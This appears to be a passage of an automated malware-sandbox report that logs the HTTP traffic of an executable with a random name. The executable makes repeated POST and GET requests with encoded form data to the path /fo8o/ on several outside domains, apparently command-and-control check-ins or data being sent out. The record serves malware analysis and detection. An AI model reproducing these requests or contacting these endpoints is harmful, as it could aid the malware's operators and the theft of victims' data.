            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=aa032d9c-4cae-49a1-8aa5-edea1cc5aeb7; expires=Fri, 02 Aug 2024 12:08:38 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:38.363200903 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWEwMzJkOWMtNGNhZS00OWExLThhYTUtZWRlYTFjYzVhZWI3IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            43192.168.2.664511199.59.243.226805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:40.427459955 CEST1808OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 66 48 53 31 72 73 73 45 76 2f 77 37 64 54 73 54 55 42 67 4a 4e 6a 76 57 48 49 4b 58 2f 4b 6d 6f 72 61 51 42 45 36 70 69 4e 52 6b 71 62 4f 73 34 5a 68 36 77 4e 58 34 6b 77 35 6c 49 56 2f 73 6e 43 65 70 56 45 63 74 52 52 49 64 68 38 69 5a 76 55 4f 37 4f 5a 6d 59 4a 5a 69 31 54 7a 70 63 5a 70 37 46 68 65 47 65 50 68 54 54 44 38 44 73 50 72 65 62 71 6a 74 48 33 34 52 4b 79 66 46 66 55 33 74 73 69 73 34 55 64 78 39 45 30 4d 78 44 67 63 72 50 50 71 31 32 45 71 31 6c 6c 78 4d 4e 6a 4d 35 6f 7a 52 4c 36 63 7a 45 49 6f 41 59 31 5a 65 62 53 4d 57 63 33 33 4a 4f 4d 53 70 64 6f 34 6b 6c 79 6f 4c 71 6c 36 56 4d 64 6b 4f 35 61 51 79 64 2b 57 36 65 66 76 49 31 54 74 59 4b 68 52 38 34 5a 75 66 56 47 67 6c 32 6e 43 62 4c 76 50 5a 6a 35 78 58 55 6a 4c 6b 44 43 6f 6e 41 42 52 2f 35 64 41 38 61 63 50 61 68 71 6d 6c 61 2f 64 6e 66 54 37 66 54 75 35 30 45 4e 55 41 49 77 62 51 4f 44 [TRUNCATED]
            Data Ascii: blWd=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEfHS1rssEv/w7dTsTUBgJNjvWHIKX/KmoraQBE6piNRkqbOs4Zh6wNX4kw5lIV/snCepVEctRRIdh8iZvUO7OZmYJZi1TzpcZp7FheGePhTTD8DsPrebqjtH34RKyfFfU3tsis4Udx9E0MxDgcrPPq12Eq1llxMNjM5ozRL6czEIoAY1ZebSMWc33JOMSpdo4klyoLql6VMdkO5aQyd+W6efvI1TtYKhR84ZufVGgl2nCbLvPZj5xXUjLkDConABR/5dA8acPahqmla/dnfT7fTu50ENUAIwbQODuMc3fCfH+zvSWm+vtGcVJG6AdAbDtwpMumsky2bjc910OOIkNfwdkcT4YUQ5tsOLtCyKV/1niyKcysA2iRpevWVCDr50/sCjOMYK2qmngdqa3tvq1oWEg2DLu7Z243EjnGpnEAi9b2EXVSk2/2zJ5W0Oc4v3A4OLIw1OP6ZLeMIEkNCwvwTnmhzsiD7fmHxLdn3Vz2NgsK5Riwun0PZpOAY/1M6Ms4sRi71avLK1bQP9fIvUjPkpbTgafhhB1hRiA19bCEG81fbmSe1p/+xtAfZbOOQiEQR4az3jm//mnQVG5wSsMJvBGV3z0FRv3DxbOmlO2/6P1cNcAnYJsBtogJRRwZf5+xVKAPVRp1OqiWryMAFFIQfj/FYlRcen3XPtTqMSV//2DpvddKeFnQ4vEv17ZvRE1tAjUneYjPSYJcIVYqlibZrXv8c/yKfUW4vpmyX54Y6JTmYoQuY/VVcx7Wdahqskfa7xMIV/Ht6rMB6xb5AzMBReRzsjNd4GarqhQ4zFkkOauF9LjeK1+xtktEnJCHMoWnit7QofStS3FbdtGbaCSBwb5wxCIcgelBXzbXaTbvHIPJUrFnVg2rsAwrQ3QHWKTiRgkuEPHDsKVFOtSVl29OL6DQS8Xdr2PYBsYnFJf8/tNyJXgEQa4NVdUDUT0WDrbxf+ro [TRUNCATED]
            Aug 2, 2024 13:53:40.922607899 CEST1236INHTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:40 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: 24f1eaba-a35b-4805-838d-dd7ad5787939
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=24f1eaba-a35b-4805-838d-dd7ad5787939; expires=Fri, 02 Aug 2024 12:08:40 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:40.922648907 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjRmMWVhYmEtYTM1Yi00ODA1LTgzOGQtZGQ3YWQ1Nzg3OTM5IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            44192.168.2.664512199.59.243.226805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:42.959279060 CEST521OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.joyesi.xyz
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:43.440464973 CEST1236INHTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:42 GMT
            content-type: text/html; charset=utf-8
            content-length: 1502
            x-request-id: 7041abb3-3e39-42ca-90e2-f20874cef9da
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cK9+Xvh5JytQQz0FIssO9+FG+B/j9hc06DGyH2SgzGII7IzY/695fW1MOGS+ZcjjEaswAEqw9fi8R84wQG7XMA==
            set-cookie: parking_session=7041abb3-3e39-42ca-90e2-f20874cef9da; expires=Fri, 02 Aug 2024 12:08:43 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 4b 39 2b 58 76 68 35 4a 79 74 51 51 7a 30 46 49 73 73 4f 39 2b 46 47 2b 42 2f 6a 39 68 63 30 36 44 47 79 48 32 53 67 7a 47 49 49 37 49 7a 59 2f 36 39 35 66 57 31 4d 4f 47 53 2b 5a 63 6a 6a 45 61 73 77 41 45 71 77 39 66 69 38 52 38 34 77 51 47 37 58 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cK9+Xvh5JytQQz0FIssO9+FG+B/j9hc06DGyH2SgzGII7IzY/695fW1MOGS+ZcjjEaswAEqw9fi8R84wQG7XMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:43.440551996 CEST955INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzA0MWFiYjMtM2UzOS00MmNhLTkwZTItZjIwODc0Y2VmOWRhIiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            45192.168.2.66451572.52.178.23805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:56.772433043 CEST786OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 34 79 62 50 6a 5a 51 79 2f 2b 55 4d 76 4a 6a 73 2b 63 46 6f 35 4c 79 6d 62 38 4f 62 33 4a 42 44 77 4c 69 2b 76 54 42 73 74 47 4f 38
            Data Ascii: blWd=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ4ybPjZQy/+UMvJjs+cFo5Lymb8Ob3JBDwLi+vTBstGO8


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            46192.168.2.66451672.52.178.23805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:59.307461977 CEST810OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 53 6b 62 2b 57 70 33 70 42 70 79 4c 61 2b 39 45 4e 4c 69 79 72 66 6c 6c 51 4d 46 35 77 49 69 37 54 55 50 52 2b 4c 34 6e 76 45 75 51 3d 3d
            Data Ascii: blWd=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbSkb+Wp3pBpyLa+9ENLiyrfllQMF5wIi7TUPR+L4nvEuQ==


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            47192.168.2.66451772.52.178.23805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:01.841324091 CEST1823OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 5a 72 68 34 50 76 77 64 52 7a 2b 5a 57 37 4c 76 66 4b 34 2f 4e 59 36 35 62 45 35 46 4a 33 69 54 79 74 6d 55 6b 53 42 2f 49 49 69 4e 37 31 42 46 62 59 79 45 62 4a 2b 47 51 65 69 79 74 6f 63 41 52 77 33 34 4e 5a 6e 61 6e 47 42 71 33 49 79 42 72 79 65 46 48 77 71 45 39 66 64 39 45 2f 58 72 6e 68 32 38 4b 37 78 61 63 42 61 2f 39 63 63 6b 69 63 63 59 65 59 78 54 74 43 6e 38 39 61 75 7a 37 73 77 38 4f 47 38 31 41 67 66 47 48 63 6a 6d 4c 67 78 36 55 6c 6f 6a 48 30 58 6f 34 42 68 64 41 4e 6c [TRUNCATED]
            Data Ascii: blWd=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqp8km4TzaZy4OaWceO0miiVQR6xtRXYs599kPFKcTFEHEEOYH1fCQcPn9y6deh+DtsMAo/+7uVrD6Kq5GrOjmc+9aFkh8I7oEIR2faad2/amimY8IstvH4Y6AWugakzu5Zrh4PvwdRz+ZW7LvfK4/NY65bE5FJ3iTytmUkSB/IIiN71BFbYyEbJ+GQeiytocARw34NZnanGBq3IyBryeFHwqE9fd9E/Xrnh28K7xacBa/9cckiccYeYxTtCn89auz7sw8OG81AgfGHcjmLgx6UlojH0Xo4BhdANlFwqzDTETYWZ10lrscV5K8Eq1PofZvv5zY5FuDKGP4i4zAVOfasmDJLhr8c6R9c6Zo5CNvWO1zlbh0+v/M+Zlto7lP8nFK1pYw3/1HWJrglj05aMEbp67zFUG4TYfqBquNenTYuTqUk0/8x4B6sWRdmcog83B3Je3fTbQG1kv/i4BRxqlHKvyWcYelvsj1O6vwD2whKJrW4/wdkJeCXZ0Hra9O/FfTWvjq8KgiO7WhREcxgGDpuc28Jo7pjtYDaNJz+hDiWULbykz+9DuXPMi24b3YKAmGeZldQzye/zYojoge7GDv9pys5kIRCCLTDAKOh6RmReFdbYeKshLxB8BL5Jq/GjOFlvACuWFEeWWB8vtx3YsRaHkcdBPJIBllckVa8/M7/VU1fRWa0VS2r84mh1RNR2E0lUjACdokbF8S2Jrlm0VofwzrrlcH4HeHScS+apPjWbFweY5sXIrQE9IaXBeMFevhG1+o1he5xIFDjqsdzyh38iKq1JP63sXsgOHBAGUyguaLYp2WNwXhT4kXuVToatLXMoMrTNYFRRtteoj5KIUOcAgIBfgPIQjANLxtP0Ic3OGzXxFjqvfwwhCAHrKQjerqxv33Nmjy/eyOdlsBIv11Y/PynlIDeeJx8x8JPpdFVnH+ghYeEpy4iiefAduQuYV5Slvbv [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            48192.168.2.66451872.52.178.23805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:04.381237030 CEST526OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.shenzhoucui.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            49192.168.2.664519194.67.71.191805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:10.112143040 CEST771OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
